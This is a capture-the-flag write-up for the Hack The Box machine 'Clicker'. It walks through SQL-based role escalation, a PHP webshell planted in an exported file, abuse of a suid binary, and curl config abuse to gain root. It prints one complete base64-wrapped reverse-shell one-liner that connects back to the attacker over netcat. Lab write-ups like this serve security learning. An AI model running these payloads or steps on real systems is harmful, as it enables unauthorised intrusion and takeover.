[HTB] Clicker

Let's start with the usual nmap scan:

After trying to visit http://10.10.11.232 we are redirected to 'clicker.htb', so let's add it to the hosts file:

Since nfs is running, we can try to see if we can mount the share:

The zip file seems to contain the source code for the website hosted on the same server:

After examining the code, we can see that the save_game.php page can be used to edit some information about the current player by performing a SQL query. However there seems to be some protection in place to prevent changing the player role.

The request is sent and the game is saved successfully:

For the new role to take effect, we need to logout and login again

By examining the admin functionality we can see that the get_top_players function is called. So basically any player with more than 1000000 clicks is shown on the dashboard.

Also there is an option to export the dashboard results to a file that will also be written to the server and its path is disclosed. Note here that the else condition will be used for any other extension including php, phtml etc.

We can simply store a php webshell in the nickname field so when the table of users with more than 1000000 clicks is exported, the webshell will be included in the content. Note that we also have to set the number of clicks to a value greater than 1000000.

After storing the webshell in the nickname field we can sent the export request and choose an arbitrary file extension

The export file is created successfully and we also get the path and filename

By navigating to the target file we can use our webshell and achieve RCE

On my kali machine I like to run the command shown below. It copies to the clipboard a base64 encoded webshell and also sets up ncat

lport=4444;echo -n "echo "$(echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $(ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1) $lport >/tmp/f" | base64 -w 0)" | base64 -d | bash" | xclip -sel clip; clear; rlwrap nc -lvp $lport

After searching around in the filesystem we can see that in the /opt/manage directory there is a suid binary owned by jack who is a low privilege user in the box. First we can transfer this file to kali for examination to see if there is any way to exploit it.

Using IDA decompiler we can see that the file accepts some predefined arguments, however if no one of the predefined arguments is provided it fall-backs to 'default'. In default it issues the same command as in the other cases, but the file is defined from the second argument. Also since 'system' is used, directory traversal is possible.

We can run the command shown below to read jack's private ssh key and login as jack to obtain the user flag

We can see that jack is allowed to run /opt/monitor.sh as root and set the environment. Since curl is run and it is known that it packs A LOT of features we can see how to abuse it to obtain root.

From 'man curl' we can see that we can set the 'CURL_HOME' variable which can contain a '.curlrc' file with additional command line options.

We can create the following '.curlrc' file in '/home/jack'. This way the request will be intercepted by burp running on our kali (which means we will be able to alter the response) and the file will be saved to the predefined path with root rights. Essentially we have achieved arbitrary file write as root (we can also overwrite the /etc/passwd file and add a new root user)

Make sure that burp proxy accepts connections from all interfaces

And run the script as root while specifying the 'CURL_HOME' env variable.

Forward the request but make sure to choose to intercept the response

In the response we just add our public key which is going to be added to root's authorized_keys file

Then we can simply ssh as root